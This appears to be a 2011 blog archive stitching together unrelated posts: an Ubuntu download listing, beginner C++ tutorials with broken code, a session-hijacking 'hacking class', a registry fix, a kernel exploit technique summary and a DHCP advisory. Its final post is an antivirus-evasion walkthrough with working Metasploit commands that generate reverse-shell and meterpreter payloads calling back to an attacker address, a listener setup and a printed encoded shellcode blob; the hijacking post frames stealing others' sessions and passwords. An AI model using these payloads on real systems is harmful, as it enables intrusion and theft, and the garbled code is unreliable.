Wednesday, April 27, 2011

Download Ubuntu 11.04

Ubuntu 11.04  (Natty Narwhal)

Download Ubuntu 11.04 Desktop CD

The desktop CD allows you to try Ubuntu without changing your computer at all, and at your option to install it permanently later. This type of CD is what most people will want to use. You will need at least 256MiB of RAM to install from this CD.
There are four images available, each for a different type of computer:
Download PC (Intel x86) desktop CD
For almost all PCs. This includes most machines with Intel/AMD/etc type processors and almost all computers that run Microsoft Windows, as well as newer Apple Macintosh systems based on Intel processors. Choose this if you are at all unsure.
Download 64-bit PC (AMD64) desktop CD
Choose this to take full advantage of computers based on the AMD64 or EM64T architecture (e.g., Athlon64, Opteron, EM64T Xeon, Core 2). If you have a non-64-bit processor made by AMD, or if you need full support for 32-bit code, use the Intel x86 images instead.
Download 64-bit Mac (AMD64) desktop CD
Choose this to take full advantage of computers based on the AMD64 or EM64T architecture (e.g., Athlon64, Opteron, EM64T Xeon). If you have a non-64-bit processor made by AMD, or if you need full support for 32-bit code, use the Intel x86 images instead. This image is adjusted to work properly on Mac systems.
Download Mac (PowerPC) and IBM-PPC (POWER5) desktop CD
For Apple Macintosh G3, G4, and G5 computers, including iBooks and PowerBooks as well as IBM OpenPower machines. Warning: This image is oversized (which is a bug) and will not fit onto a standard 700MiB CD. However, you may still test it using a DVD, a USB drive, or a virtual machine.
A full list of available files can be found below.
If you need help burning these images to disk, see the CD Burning Guide.


Icon  Name                              Last modified      Size  Description
- [   ] MD5SUMS 27-Apr-2011 17:09 237 [   ] MD5SUMS-metalink 27-Apr-2011 17:10 257 [   ] MD5SUMS-metalink.gpg 27-Apr-2011 17:10 198 [   ] MD5SUMS.gpg 27-Apr-2011 17:09 198 [   ] SHA1SUMS 27-Apr-2011 17:10 269 [   ] SHA1SUMS.gpg 27-Apr-2011 17:10 198 [   ] SHA256SUMS 27-Apr-2011 17:10 365 [   ] SHA256SUMS.gpg 27-Apr-2011 17:10 198 [   ] natty-desktop-amd64+mac.iso 27-Apr-2011 17:06 694M [   ] natty-desktop-amd64+mac.iso.zsync 27-Apr-2011 17:09 1.4M [   ] natty-desktop-amd64+mac.list 27-Apr-2011 17:06 4.1K [TXT] natty-desktop-amd64+mac.manifest 25-Apr-2011 23:10 40K [   ] natty-desktop-amd64+mac.metalink 27-Apr-2011 17:10 1.0K [   ] natty-desktop-amd64.iso 27-Apr-2011 17:05 698M [   ] natty-desktop-amd64.iso.zsync 27-Apr-2011 17:09 1.4M [   ] natty-desktop-amd64.list 27-Apr-2011 17:05 4.0K [TXT] natty-desktop-amd64.manifest 25-Apr-2011 23:10 40K [   ] natty-desktop-amd64.metalink 27-Apr-2011 17:10 1.0K [   ] natty-desktop-i386.iso 27-Apr-2011 17:07 685M [   ] natty-desktop-i386.iso.zsync 27-Apr-2011 17:09 1.3M [   ] natty-desktop-i386.list 27-Apr-2011 17:07 3.7K [   ] natty-desktop-i386.metalink 27-Apr-2011 17:10 1.0K [   ] natty-desktop-powerpc.OVERSIZED 27-Apr-2011 17:09 0 [   ] natty-desktop-powerpc.iso 27-Apr-2011 17:08 707M [   ] natty-desktop-powerpc.iso.zsync 27-Apr-2011 17:09 1.4M [   ] natty-desktop-powerpc.list 27-Apr-2011 17:08 1.3K [TXT] natty-desktop-powerpc.manifest 25-Apr-2011 23:13 38K [   ] natty-desktop-powerpc.metalink 27-Apr-2011 17:10 1.0K 
 
Download Ubuntu 11.04,Download Ubuntu,Ubuntu 11.04, ,natty-desktop-i386.iso 

Creating and Executing a Dev-C++ 4 Application

OLD IS GOLD :P
Dev-C++ is a free programming environment. To get it, you can download it from http://www.bloodshed.net. If you decide to use it, you should help the developers with a financial contribution.
  1. Start Dev-C++ 4

  2. On the main menu, click File -> New Project...
  3. On the New Project dialog box, click the Project property sheet if necessary.
    Click Console Application

  4. Click OK.
  5. On the subsequent New Project dialog box, type Exercise to change the name of the project:

  6. Click OK. You will be asked to create a location for the project.
  7. Click the Create New Folder button .
  8. Type Exercise1 and press Enter.
  9. Double-click Exercise1 to display it in the Save In combo box:

  10. Click Save.
  11. Because the project has already been saved, it is better to save your C++ files as you go. As it happens, Dev-C++ has already created the first C++ file for you.
    Change the contents of the file as follows:
     
    #include 
    #include 
    
    int main(int argc, char *argv[])
    {
    cout << "C++ is Fun!!!";
    getchar();
    return 0;
    }

  12. To save the current C++ file, on the Main toolbar, click the Save button
  13. Type Exo as the name of the file.
  14. Click Save.
  15. To execute the program, on the main menu, click Execute -> Compile

  16. After the program has been compiled, click Execute.
  17. After viewing the program, press Enter to close the DOS window to return to Dev-C++
 
Borland C++BuilderX

Borland C++BuilderX is a commercial programming environment developed by Borland.
To help programmers, Borland published a free version, called Personal Edition, that you
can download and use for your lessons.
  1. On the main menu of C++BuilderX, click File -> New...
  2. In the Object Gallery dialog box, click New Console

  3. Click OK
  4. In the New Console Application - Step 1 of 3, enter the name of the new application
  5. in the Name edit box. In this case, you can type Exercise1

  6. Click Next

  7. In the New Console Application Wizard - Step 2 of 3, accept all defaults and click Next
  8. In the New Console Application Wizard - Step 3 of 3, click the check box under Create
  9. Click Untitled1 and delete it to replace it with Exercise

  10. Click Finish
  11. In the Project Content frame, double-click Exercise.cpp to display it in the right frame

  12. To execute the application, on the main menu, click Run -> Run Project

C++ Projects

C++ Instructions
C++ works by giving (separate) instructions to the computer. These instructions can be treated as assignments. On this site, such an assignment will be called a function. The primary function used in C++ is called main. To distinguish a function from the other types of things you will be using in your programs, a function's name is followed by an opening and a closing parentheses. For example, the main function will always be written at least as main(). When we perform a better study of functions, we will learn more about functions, their parentheses, and other related issues.

When a program is written and you ask the computer to "execute" it, the first thing to look for is the main() function. This means that every C++ program should have the main() function. Because a function is an assignment, in order to perform its job, a function has a body; this is where the behavior (assignment) of the function would be "described". The body of a function starts with an opening curly bracket "{" and closes with a closing curly bracket "}". Everything in between belongs to, or is part of, the function. Therefore, the main() function can be written as:

main() {}

As we learned that we should (must) always include the libraries that we would need, our program now would include main(). Whenever you create a program, it is important to isolate any inclusion of a library on its own line. Here is an example:

#include
using namespace std;
main(){}

C++ is the computer language we are going to study to write programs. C++ is a very universal language, it can be used to write programs for Linux, MS Windows, Macintosh, BeOS, Unix, etc. C++ is very powerful and can be used to create other compilers or languages, it can also be used to write an operating system. This means that you can use C++ to create/write your own computer language. You can also use C++ to create/write your own compiler; this means that, using C++, you can create your own implementation of C++, Pascal, Basic, Perl, or any other existing or non-existing language.

There are many products you can use to create a program in C++. Before a program is made available, it is called a project because you are working on it. Although in the beginning you will usually be working alone, most programs involve a lot of people. That is why during the development of a program or software product, it is called a project. Each one of the available environments provides its own technique(s) of creating a C++ program or working on a C++ project. Therefore, the person who, or the company that, made the environment available to you must tell you how to use that environment (it is neither your responsibility, nor the C++ Standard’s job to tell you how to create a program or how to start a project). I will try to cover those that I know.

The programs we will be creating on this site are called console applications. They can also be called Bash programs (especially on Unix/Linux). The technique you follow to create a project depends on the environment you are using.

Executing a Program
To see what your program does, you need to realize that the lines we have typed are English language instructions asking C++ to perform the main() function. Unfortunately, the computer doesn't understand what all of this means (to a certain extent). The computer has its own language known as the machine language. So, we need to translate it in a language the computer can understand. A program was created to that effect and supplied to you with C++. This is what we call a compiler.
In the past, a program used to be created from various parts all over the computer, some of the techniques are still used to "debug" a program to isolate problems or "bugs". Since this is a small program, we will just ask the computer to "execute" it and see the result. Throughout this site, the words (or verbs) "execute" and "run" will be used interchangeably to mean the same thing.
The C++ language doesn't define how to create a project. When you buy or acquire a c++ compiler, its documentation should tell you how to create and execute a project. We describe here how how to create a project in most familiar environments. If you have an environment or compiler that is not in our list, consult its documentation to know how to use it.

One of our most valuable goals in writing a site is to avoid including in a program an issue that has not previously been addressed or explained. This site is written as a (general) reference towards the C++ language. To learn C++, you need a C++ compiler, and we describe how to create a C++ project with some of the most commonly used compilers or programming environments. As it happens, and as you may have noticed, different companies (and different individuals for that matter) choose to implement a language as they see fit.
Depending on the programming environment you are using, even depending on how you create your program (for example KDevelop, Borland C++ Builder, and Microsoft Visual C++ all provide more than one way to create or start a console application), sometimes you have a starting empty file or a file with a few lines. Whatever is in the file, you do not need to delete it. For example, KDevelop displays a commented message in the file. You should not delete that text and it will never interfere with your program. Borland C++ Builder opens a file with a couple of "#pragma" lines. You will never have any reason to delete those lines, although you can, without any risk; but since they do not affect your program, why waste your time deleting them?
Depending on the programming environment you are using and how you create your program, the first file may display a line as #include or another #include line. The file may also have a main() function already included. Here is how we will deal with this issue:
  • If the file displays a line with #include Something, leave it as is. It will not negatively affect your program. Such a file has been tested
  • If the file displays a line with #include , leave it like that and continue with our other instructions
  • If the file is empty or it does not include a line with #include at all, then you will just follow our instructions and type them as given
  • If the file already includes the main() function, with a line like int main(Something), use that main() function for the exercises in this book. Unless stated otherwise, that function is ready for you and don't modify the Something part between the parentheses.
From now on, you will sometimes be asked to create a project. Follow the instructions of your compiler as we have seen above.

Introduction to Header Files

C++ is a huge language so much that it uses various sets of instructions from different parts to do its work. Some of these instructions come in computer files that you simply "put" in your program. These instructions or files are also called libraries. To make your job easier, some of these libraries have already been written for you so that as you include them in your program, you already have a good foundation to continue your construction. Yet, some of these libraries have their limitations, which means you will expand them by writing or including your own libraries.
As noted already, there are libraries previously written for you. One of them asks the computer to receive keyboard strokes from you the user (when you press a key) and another asks the machine (the computer performing some operations) to give back a result. The libraries are files that you place at the beginning of your program as if you were telling the computer to receive its preliminary instructions from another program before expanding on yours. The libraries are (also) called header files and, as computer files, they have the extension ".h". An example would be house.h, or person.h. As you see, they could have any name; when you start creating your own libraries, you will give your files custom and recognizable names.
The first library we will be interested in is called iostream. It asks the computer to display stuff on the monitor's screen.
To see how to put a library in your program, you put it at the beginning of the file. Here is an example:
iostream.h
To use a library in your program, you simply include it by using the word "include" before the name of the library, as follows:
include iostream.h
Since this is a computer language, the computer will follow particular instructions to perform appropriately, which will make this language distinct from the everyday languages. C++ has some words it treats specially and some that will completely depend on you the programmer. For example, the word "include" could be a special word used by C++ or a regular you want to use in your program. In this particular situation, if you want the computer to "know" that the word "include" means, "I want to include the following library", you will have to append a special sign to it. The pound sign "#" will do just that. Therefore, to include a library, you precede the include word with the # sign.
Here is an example:
#include iostream.h
There are usually two kinds of libraries or files you will use in your programs: libraries that came with C++, and those that you write. To include your own library, you would enclose it between double quotes, like this
#include "books.h"
When you include a library that came with C++, you enclose it between < and > as follows:
#include 
Following this same technique, you can add as many libraries as you see fit. Before adding a file, you will need to know what that file is and why you need it. This will mostly depend on your application. For example, you can include a library called stdio like this:
#include 
#include 

 
Introduction to Namespaces

A namespace is a section of code, delimited and referred to using a specific name. A namespace is created to set apart a portion of code with the goal to reduce, otherwise eliminate, confusion. This is done by giving a common name to that portion of code so that, when referring to it, only entities that are part of that section would be referred to.
Because C++ is so huge, its libraries are created in different namespaces, each with a particular name. To use an existing namespace in your program, you must know its name. To use such a namespace, you can type the using namespace expression followed by the name of the namespace and a semi-colon. For example, to use a namespace called django, you would type:
using namespace django;
One of the namespaces used in C++ is called std. Therefore, to use it, you can type:
using namespace std;
After typing this, any part of the namespace becomes available to you. The iostream library we mentioned above is part of the std namespace. When you use it, you don't need to include the extended of the iostream file. For this reason, you can start your program with:
#include 
using namespace std;

Introduction to C++

Overview
A computer is a machine that receives instructions and produces a result after performing an appropriate assignment. Since it is a machine, it expects good and precise directives in order to do something. The end result depends on various factors ranging from the particular capabilities of the machine, the instructions it received, and the expected result.

As a machine, the computer cannot figure out what you want. The computer doesn't think and therefore doesn't make mistakes.
Computer programming is the art of writing instructions (programs) that ask the computer to do something and give a result. A computer receives instructions in many different forms, four of which are particularly important.
The first instructions are given by the manufacturers of various hardware parts such as the microprocessor, the motherboard, the floppy and the CD-ROM drives, etc. These parts are usually made by different companies, setting different and various goals that their particular part can perform. The instructions given to the microprocessor, for example, tell it how to perform calculations, at what speed, and under which circumstances. The instructions given to the motherboard tell it to behave like a city where people and cars can move from one part of the town to another, back and forth, for various reasons; this allows information to flow from one part of the city, I mean one section of the computer, to another.
Once the instructions given to the hardware parts are known, software engineers use that information to give the second sets of instructions to the computer. These instructions, known as an operating system, are usually written by one company. These second instructions tell the computer how to coordinate its different components so the result will be a combination of different effects. This time, the computer is instructed about where the pieces of information it receives are coming from, what to do with them, then where to send the result. This time also the operating system designers impose a lot of behaviors to the computer as a machine. Again this time, some computer languages are developed so that programmers can write applications as the third set of instructions. It is like developing languages that people in a city can use to talk to each other. Consider that from now on (once the OS is developed), people get into the habit of doing things according to their particular culture or taste, speaking different languages that their neighbor doesn't understand... Luckily, the computer, I should say the OS, understands all these languages (I can't guaranty that). Some of the operating systems on the market are: Microsoft Windows 3.X, Corel Linux, IBM OS\2, Microsoft Windows 9X, Apple OS 10, Red Hat Linux, Microsoft Windows Millennium, BeOS, Caldera Linux, Microsoft Windows 2000 etc. A particular OS (for example Microsoft Windows 98) depending on a particular processor (for example Intel Pentium) is sometimes referred to as a platform. Some of the computer languages running on Microsoft Windows operating systems are C++, Pascal, Basic, and their variants. 

The actual third set of instructions are given to the computer by you, the programmer, using one or more of the languages that the operating system you are planning to use can understand. Your job is going to consist of writing applications. As a programmer, you write statements such as telling the computer, actually the operating system, that "If the user clicks this, do the following, but if he clicks that, do something else. If the user right clicks, display this; if he double-clicks that, do that." To write these instructions, called programs, you first learn to "speak" one of the languages of the OS. Then, you become more creative... Some of the application programs in the market are Microsoft Word, Lotus ScreenCam, Adobe Acrobat, Jasc Paint Shop Pro, etc.
The last instructions are given by whoever uses your program, or your application. For example, if you had programmed Microsoft Word, you would have told the computer that "If a user clicks the New button on the Standard toolbar, I want you to display a new empty document. But if the user clicks File -> New..., I want you to 'call' the New dialog and provide more options to create a new document. If the same user right-clicks on any button on any of the toolbars, I want you to show, from a popup menu, all the toolbars available so she can choose which one she wants. But if she right-clicks on the main document, here is another menu I want you to display."
At this time, you have probably realized that the users of your programs depend on your techniques as a developer to provide an easy to use application (that's what recruiters and employers call experience and creativity). You depend on the computer language that you are actually using (every computer language has its ups and downs). Your computer language depends on the operating system it is running on (different 
operating systems have different strengths and weaknesses). The operating system depends on the microprocessor or the machine it is running in (the biggest difference between two microprocessors is the speeds at which each processes information).

Your interest here is on the computer languages, since you are going to write programs. There are various computer languages, for different reasons, capable of doing different things. Fortunately, the computer can distinguish between different languages and perform accordingly. These instructions are given by the programmer who is using compilers, interpreters, etc, to write programs. Examples of those languages are Basic, C++, Pascal, etc.

Saturday, April 23, 2011

How to hack online Sessions : Session Hijacking

Hello friends, from now onwards we will explore the most advanced Hacking Techniques. One of them is Session Hijacking. In today's tutorial we will discuss How to hack the online sessions using Session Hijacking. In today's Hacking class, i will explain basics of Session Hijacking like What is session Hijacking and Different types of Session Hijacking attacks and different methods to Hijack the sessions. In my next tutorial that is tomorrow i will explain you in Detail How to Hijack the Sessions and what tools you will need to Hijack the active sessions. So friends read on...


How to hack online sessions, session hijacking
How Session Hijacking works




What is Session Hijacking?
Let's discuss them in common term's, Session Hijacking by the name only it suggests that we are hacking someone's active session and trying to exploit it by taking the unauthorized access over their computer system or Network. So Session Hijacking is the exploitation of valid computer or network session. Sometimes technical guys also call this HTTP cookie theft or more correctly Magic Cookie Hack. Now you guys surely be thinking what is Magic Cookie.
Magic cookie is simply a cookie that is used to authenticate the user on remote server or simply computer. In general, cookies are used to maintain the sessions on the websites and store the remote address of the website. So in Session Hijacking what Hacker does is that he tries to steal the Magic cookies of the active session that's why its called HTTP cookie Theft. Nowadays several websites has started using HTTPS cookies simply called encrypted cookies. But we all know If encrypter exits so its decrypter also :P..


Session Hijacking is the process of taking over a existing active session. One of the main reason for Hijacking the session is to bypass the authentication process and gain the access to the machine. Since the session is already active so there is no need of re-authenticating and the hacker can easily access the resources and sensitive information like passwords, bank details and much more. 


Different Types of Session Hijacking
Session Hijacking involves two types of attacks :
1. Active attack
2. Passive attack


In Passive attack, the hacker Hijacks a session, but just sits back and watches and records all the traffic that is being sent from the computer or received by the computer. This is useful for finding the sensitive information like username passwords of websites, windows and much more...


In Active attack, hacker finds the active session and takes over it. This is done by forcing one of the parties offline which is usually achieved by DDOS attack (Distributed Denial of service attack) . Now the hacker takes control over the active session and executes the commands on the system that either give him the sensitive information such as passwords or allow him to login at later time.
 There are also some hybrid attacks, where the attacker watches a session for while and then becomes active by taking it over. Another way is to watch the session and periodically inject data into the active session without actually taking it over.


Methods to Hijack Sessions
 There are four main methods used to perpetrate a session hijack. These are:

  • Session fixation, where the attacker sets a user's session id to one known to him, for example by sending the user an email with a link that contains a particular session id. The attacker now only has to wait until the user logs in.
  • Session sidejacking, where the attacker uses packet sniffing to read network traffic between two parties to steal the session cookie. Many web sites use SSL encryption for login pages to prevent attackers from seeing the password, but do not use encryption for the rest of the site once authenticated. This allows attackers that can read the network traffic to intercept all the data that is submitted to the server or web pages viewed by the client. Since this data includes the session cookie, it allows him to impersonate the victim, even if the password itself is not compromised. Unsecured Wi-Fi hotspots are particularly vulnerable, as anyone sharing the network will generally be able to read most of the web traffic between other nodes and the access point.
  • Alternatively, an attacker with physical access can simply attempt to steal the session key by, for example, obtaining the file or memory contents of the appropriate part of either the user's computer or the server.
  • Cross-site scripting, where the attacker tricks the user's computer into running code which is treated as trustworthy because it appears to belong to the server, allowing the attacker to obtain a copy of the cookie or perform other operations.
That's all for today later we will discuss in detail How to do the Session Hijacking practically. 
I hope you all like this...
If you have any queries ask me in form of comments...

How to Enable Registry disabled by Administrator

Hello friends, today i will explain you the solution of very common problem that usually users face i.e whenever you try to open registry editor you get an error message "Registry has been disabled by Your Administrator". It's a very common problem and its solution is also quite simple if you know playing with registry. My main motive is not to provide or directly feed you the solution. I want that you should explore the things. So Let's explore the registry... 

Enable registry disabled by admiistrator or admin
Enable Registry Disabled by Administrator

 
What is Registry?
The Windows Registry is a hierarchical database that stores configuration settings and options on Microsoft Windows operating systems. It contains settings for low-level operating system components as well as the applications running on the platform: the kernel, device drivers, services, SAM, user interface and third party applications all make use of the registry. The registry also provides a means to access counters for profiling system performance.
I know most of you know that registry is called the "BRAIN OF WINDOWS" which store all the information in form of registry keys or technically we call them DWORD or STRING or BINARY or MULTI-STRING values which stores the data into the data in the form the name suggests. 


How to enable the Registry disabled by Administrator?
The following message usually displayed when your system is infected by some virus that changes the registry value and hence you get an error message displaying " Registry is disable by Admin". So to fix it you also have to edit the registry but since your registry has been disabled so you cannot directly access it. For this you need to create one registry file that will update the dword value into the registry database.

Steps to enable registry:
1. Open the Notepad.
2. Copy the below code and paste into the notepad.

Windows Registry Editor Version 5.00
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System]
"DisableRegistryTools"=dword:00000000

3. Now save the Notepad file as "anything.reg"(without quotes) and remember to select the file type as all files while saving otherwise you will not been able to execute it.

4. Now Close the file and open by double click on file and then click ok.



How to Do it using GPEDIT.MSC
Just follow this:
Start -> Run -> gpedit.msc -> User Configuration -> Administrative Templates -> System -> Prevent access to registry editing tools -> Right Click Properties -> Disabled


That's all the simple hack to Enable the Registry disabled by Administrator. Isn't that simple...

Wednesday, April 20, 2011

Your Way to grsec/PaX Bypass-stackjacking

Technique to exploit grsecurity/PaX-hardened Linux kernels.  Read on for a brief overview of our presentation and a link to the full slides and PoC code.
By (Dan Rosenberg and jon oberheide)

The Stackjacking Technique

In our slides, we presented a technique to exploit a grsecurity/PaX-hardened Linux kernel (eg. GRKERNSEC_HIGH) given the existence of two exploitation primitives:
  • an arbitrary kernel write; and
  • a kernel stack memory disclosure
To be clear, this attack vector is completely unnecessary when exploiting a vanilla Linux kernel, since an arbitrary write is more than sufficient to get root, given the vast amount of useful targeting information Linux gives out via /proc, etc. Likewise, the kernel stack memory disclosure is also unnecessary on vanilla, since there are much easier ways of getting this information. However, due to GRKERNSEC_HIDESYM (which aims to remove all known sources of info leakage), PAX_KERNEXEC (which makes global data structures with known locations read-only), and other mitigation features of grsecurity/PaX, effective exploitation is orders of magnitude harder than a vanilla kernel and took a few interesting twists.
Our technique can be broken down into three distinct stages:
  • Stack self-discovery: We observed that kernel stack memory disclosures can leak sensitive addresses to userspace.  In particular, if we can leak a pointer TO the kernel stack that resides ON the kernel stack, we can calculate the base of our own process’ kernel stack: kstack_base = leaked_addr & ~(THREAD_SIZE-1).  We call this technique stack self-discovery.
  • Stack groping: If our end goal is to read the address of our process’ cred structure and use our write to modify it and escalate privileges, we need to turn our kleak+kwrite into an arbitrary read.  We discovered two such techniques to do this: (1) the Rosengrope technique that modifies addr_limit in thread_info metadata stored at the base of the kstack to allow arbitrary reads from kernel space to userspace; and (2) the Obergrope technique that manipulates saved registers within a kernel stack frame that are later popped and used as the source address for copy_to_user()/put_user() operations.
  • Stack jacking: After constructing our arbitrary read from a kleak+kwrite, we read the task_struct address out of thread_info at the base of the kstack and then read the cred struct address out of task_struct. Armed with the address of our process’ credential structure and an arbitrary write, we modified our uids/gids/caps to escalate privileges.
For the full details, please see the presentation materials and PoC code:

The Response

If you haven’t yet read spender’s response to our presentation, I recommend doing so.  While I’ll refrain from commenting on the political aspects of his post, I’ll happily comment on the technical aspects.  The fixes that spender and pipacs have released have mitigated the particular exploit vectors we used to perform the stack groping stage of our attack against the grsec/PaX kernel:
  • The thread_info struct has been moved out from the base of the kernel stack preventing the Rosengrope technique from being able to write KERNEL_DS into the addr_limit member.
  • The RANDKSTACK feature, now available on both i386 and amd64, frustrates the Obergrope technique as the randomization of the kernel stack pointer on each system call makes writing into a particular offset in the stack frame unreliable.
Props to spender and pipacs for cranking out those fixes as well as a number of other enhancements.  While the latest grsecurity patch effectively prevents the current vectors we discovered and presented in our talks at HES and Infiltrate, there are several loose ends I need to investigate to ensure the fixes address other potential exploitation vectors.
More on that later…

DHCP vulnerability in some Ubuntu releases

Ubuntu Security Notice USN-1108-2
April 19, 2011

dhcp3 vulnerability
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 10.10
- Ubuntu 10.04 LTS
- Ubuntu 9.10

Summary:

An attacker's DHCP server could send crafted responses to your computer and
cause it to run programs as root.

Software Description:
- dhcp3: DHCP Client 
 
Details:

USN-1108-1 fixed vulnerabilities in DHCP. Due to an error, the patch to fix
the vulnerability was not properly applied on Ubuntu 9.10 and higher. This
update fixes the problem.

Original advisory details:

 Sebastian Krahmer discovered that the dhclient utility incorrectly filtered
 crafted responses. An attacker could use this flaw with a malicious DHCP
 server to execute arbitrary code, resulting in root privilege escalation.

Update instructions:

The problem can be corrected by updating your system to the following
package versions:

Ubuntu 10.10:
  dhcp3-client                    3.1.3-2ubuntu6.2

Ubuntu 10.04 LTS:
  dhcp3-client                    3.1.3-2ubuntu3.2

Ubuntu 9.10:
  dhcp3-client                    3.1.2-1ubuntu7.3

In general, a standard system update will make all the necessary changes.

References:
  CVE-2011-0997

Package Information:
  https://launchpad.net/ubuntu/+source/dhcp3/3.1.3-2ubuntu6.2
  https://launchpad.net/ubuntu/+source/dhcp3/3.1.3-2ubuntu3.2
  https://launchpad.net/ubuntu/+source/dhcp3/3.1.2-1ubuntu7.3

Saturday, April 16, 2011

Bypass Antivirus Protection And Execute Metasploit Payloads

Shellcodeexec: Execute Metasploit Payloads Bypassing Antivirus Protection!
Picture this – you are performing a penetration test and you find a unpatched machine. The machine is so ill-patched that you can even run the SMBv2 (CVE-2009-3103) exploit via Metasploit and your execute from memory meterpreter script fails you. The antivirus flags you and your exploit runs unsuccessfully. msfencode does not help either! What do you do then? Use Shellcodeexec, a script to execute in memory a sequence of opcodes. Its current features include:
  • Can be compiled and works on POSIX (Linux/Unices) and Windows systems.
  • Can be compiled and works on 32-bit and 64-bit architectures.
  • As far as I know, no AV detect it as malicious.
  • Works in DEP/NX-enabled environments: it allocates the memory page where it stores the shellcode as +rwx – Readable Writable and eXecutable.
  • It supports alphanumeric encoded payloads: you can pipe your binary-encoded shellcode (generated for instance with Metasploit’s msfpayload) to Metasploit’s msfencode to encode it with the alpha_mixed encoder. Set the BufferRegister variable to EAX registry where the address in memory of the shellcode will be stored, to avoid get_pc() binary stub to be prepended to the shellcode.
  • Spawns a new thread where the shellcode is executed in a structure exception handler (SEH) so that if you wrap shellcodeexec into your own executable, it avoids the whole process to crash in case of unexpected behaviours.
How to use shellcodeexec?
The author presents perfect examples to run the tool. We have listed them as under:
1. Generate a Metasploit shellcode and encode it with the alphanumeric encoder. For example for a Linux target:
1
$ msfpayload linux/x86/shell_reverse_tcp EXITFUNC=thread LPORT=4444 LHOST=192.168.136.1 R | msfencode -a x86 -e x86/alpha_mixed -t raw BufferRegister=EAX
Or for a Windows target:
1
$ msfpayload windows/meterpreter/reverse_tcp EXITFUNC=thread LPORT=4444 LHOST=192.168.136.1 R | msfencode -a x86 -e x86/alpha_mixed -t raw BufferRegister=EAX
2. Execute the Metasploit multi/handler listener on your machine. For example for a Linux target:
1
$ msfcli multi/handler PAYLOAD=linux/x86/shell_reverse_tcp EXITFUNC=thread LPORT=4444 LHOST=192.168.136.1 E

Or for a Windows target:
1
$ msfcli multi/handler PAYLOAD=windows/meterpreter/reverse_tcp EXITFUNC=thread LPORT=4444 LHOST=192.168.136.1 E
3. Execute the alphanumeric-encoded shellcode with this tool. For example on the Linux target:
1
$ ./shellcodeexec
Or, on the Windows target:
1
C:WINDOWSTemp>shellcodeexec.exe
Download shellcodeexec (inquisb-shellcodeexec.zip) here.

2nd:


Background

Most of the shellcode launchers out there, including proof of concepts part of many security books, detail how to allocate a memory page as readable/writable/executable on POSIX systems, copy over your shellcode and execute it. This works just fine. However, it is limited to POSIX, does not necessarily consider 64-bit architecture and Windows systems.

Description

This script and the relevant project files (Makefile and Visual Studio files) allow you to compile the tool once then run your shellcode across different architectures and operating systems.

Moreover, it solves a common real world issue: the target system's anti virus software blocking a Metasploit-generated payload stager (either EXE of ELF). Take for instance the following command line:
$ msfpayload windows/meterpreter/reverse_tcp EXITFUNC=process LPORT=4444 LHOST=192.168.136.1 R | msfencode -a x86 -e x86/shikata_ga_nai -o /tmp/payload.exe -t exe
This generates a Metasploit payload stager, payload.exe, that as soon as it lands on the AV-protected target system is recognized as malicious and potentially blocked (depending on the on-access scan settings) by many anti virus products. At the time of writing this text, 21 out 41 anti viruses detect it as malicious. By encoding it multiple times with msfencode, less AV softwares detect it, still a lot.

I have been surfing the Net and found some interesting tutorials and guides about packing, compressing, obfuscating and applying IDA-foo to portable executables et similar in order to narrow down the number of AV products that can detect it as a malicious file. This is all interesting, but does not stop few hard-to-die anti viruses to detect your backdoor.

So the question is, how cool would it be to have a final solution to avoid all this hassle? This is exactly where this tool comes into play!

Features

  • Can be compiled and works on POSIX (Linux/Unices) and Windows systems.
  • Can be compiled and works on 32-bit and 64-bit architectures.
  • As far as I know, no AV detect it as malicious.
  • Works in DEP/NX-enabled environments: it allocates the memory page where it stores the shellcode as +rwx - Readable Writable and eXecutable.
  • It supports alphanumeric encoded payloads: you can pipe your binary-encoded shellcode (generated for instance with Metasploit's msfpayload) to Metasploit's msfencode to encode it with the alpha_mixed encoder. Set the BufferRegister variable to EAX registry where the address in memory of the shellcode will be stored, to avoid get_pc() binary stub to be prepended to the shellcode.
  • Spawns a new thread where the shellcode is executed in a structure exception handler (SEH) so that if you wrap shellcodeexec into your own executable, it avoids the whole process to crash in case of unexpected behaviours.
Example

1. Generate a Metasploit shellcode and encode it with the alphanumeric encoder. For example for a Windows target:
$ msfpayload windows/meterpreter/reverse_tcp EXITFUNC=thread LPORT=4444 LHOST=192.168.136.1 R | msfencode -a x86 -e x86/alpha_mixed -t raw BufferRegister=EAX
[*] x86/alpha_mixed succeeded with size 634 (iteration=1)


PYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIIlKXNiEPEPC0CPMYIuTqN2E
4LKV2P0NkCbTLLKQBEDNkQbGXTOLwCzEvP1IoTqIPNLGLCQQlERTlEpIQZoVmEQO7KR
ZPPRQGNkCbTPLKRbElEQZpNkCpQhLEIPQdPJGqZpPPLKQXR8NkQHEpGqN3M3ElG9LKP
4NkEQZvP1KOEaO0LlO1ZoTMEQIWVXM0QeKDTCCML8EkQmEtPuIrV8LKQHEtC1KcE6Nk
VlRkNkRxELC1ICLKETNkGqN0MYRdQ4VDQKCkCQPYCjCaIoKPV8CoPZLKR2ZKMVCmQ
xVSGBC0EPRHCGPsP2QORtCXPLCGEvEWIoZuX8LPGqEPGpQ9ITCdV0CXEyMPPkC0IoKeR
pV0RpPPCpPPG0RpPhIzTOIOKPKOKeLWRJEUPhKpNHMXVaRHVbC0R1ClMYM6PjTPCfV7
E8NyI5PtQqKOIEMUKpT4TLIoPNVhCEXlRHXpOEI2PVIoZuQzGpRJGtV6QGQxC2IIZhQOKO
N5LKP6PjCpCXEPVpC0EPPVCZEPQxV8OTCcM5IoN5LSPSPjEPQFCcV7CXC2KiIXQOIoZuC
1KsVIO6OuZVCEXlISAA
2. Execute the Metasploit multi/handler listener on your machine. For example for a Windows target:
$ msfcli multi/handler PAYLOAD=windows/meterpreter/reverse_tcp EXITFUNC=thread LPORT=4444 LHOST=192.168.136.1 E
3. Execute the alphanumeric-encoded shellcode with this tool. For example on the Windows target:
C:\WINDOWS\Temp>shellcodeexec.exe PYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIIlKXNiEPEPC0CPMYIuTqN2E4L
KV2P0NkCbTLLKQBEDNkQbGXTOLwCzEvP1IoTqIPNLGLCQQlERTlEpIQZoVmEQO7KRZPP
RQGNkCbTPLKRbElEQZpNkCpQhLEIPQdPJGqZpPPLKQXR8NkQHEpGqN3M3ElG9LKP4Nk
EQZvP1KOEaO0LlO1ZoTMEQIWVXM0QeKDTCCML8EkQmEtPuIrV8LKQHEtC1KcE6NkVlR
